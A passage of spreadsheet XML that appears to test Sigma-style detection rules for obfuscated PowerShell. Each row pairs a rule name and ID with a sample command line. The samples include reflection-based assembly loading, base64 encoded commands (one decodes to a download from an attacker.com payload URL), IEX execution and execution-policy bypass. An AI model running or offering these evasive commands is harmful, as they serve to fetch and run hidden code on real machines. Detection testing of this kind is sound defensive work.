      <c r="E62" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Reflection.Assembly]::(\" {1}{0}\" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C63" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D63" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E63" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(\" {1}{0}\" -"f" 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="43" t="n"/>
      <c r="J63" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C64" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D64" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E64" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="43" t="n"/>
      <c r="J64" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C65" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D65" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E65" s="36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F65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="36" t="n"/>
      <c r="J65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="n"/>
      <c r="B66" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C66" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D66" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E66" s="36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66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="36" t="n"/>
      <c r="J66" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="n"/>
      <c r="B67" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C67" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D67" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E67" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="36" t="n"/>
      <c r="J67" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C68" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D68" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E68" s="36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68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C69" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D69" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E69" s="36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69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="36" t="n"/>
      <c r="J69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C70" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D70" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E70" s="36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70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="36" t="n"/>
      <c r="J70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C71" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D71" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E71" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C72" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D72" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E72" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEDCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="43" t="n"/>
      <c r="J72" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="n"/>
      <c r="B73" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C73" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D73" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E73" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcodEDCOmManD Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C74" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D74" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E74" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="43" t="n"/>
      <c r="J74" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C75" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D75" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E75" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDedcomMaND Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="43" t="n"/>
      <c r="J75" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C76" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D76" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E76" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enCOdEDCOMMaNd Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="43" t="n"/>
      <c r="J76" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C77" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D77" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E77" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="n"/>
      <c r="B78" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C78" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D78" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E78" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="36" t="n"/>
      <c r="J78" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="43" t="n"/>
      <c r="B79" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C79" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D79" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E79" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="36" t="n"/>
      <c r="J79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C80" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D80" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E80" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FilE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="36" t="n"/>
      <c r="J80" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C81" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D81" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E81" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="36" t="n"/>
      <c r="J81" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C82" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D82" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E82" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="36" t="n"/>
      <c r="J82" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C83" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D83" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E83" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C84" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D84" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E84" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C85" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D85" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E85" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="43" t="n"/>
      <c r="J85" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C86" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D86" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E86" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="36" t="n"/>
      <c r="J86" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="43" t="n"/>
      <c r="B87" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C87" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D87" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E87" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="43" t="n"/>
      <c r="J87" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="43" t="n"/>
      <c r="B88" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C88" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D88" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E88" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="36" t="n"/>
      <c r="J88" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="43" t="n"/>
      <c r="B89" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C89" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D89" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E89" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="43" t="n"/>
      <c r="B90" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C90" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D90" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E90" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="43" t="n"/>
      <c r="B91" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C91" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
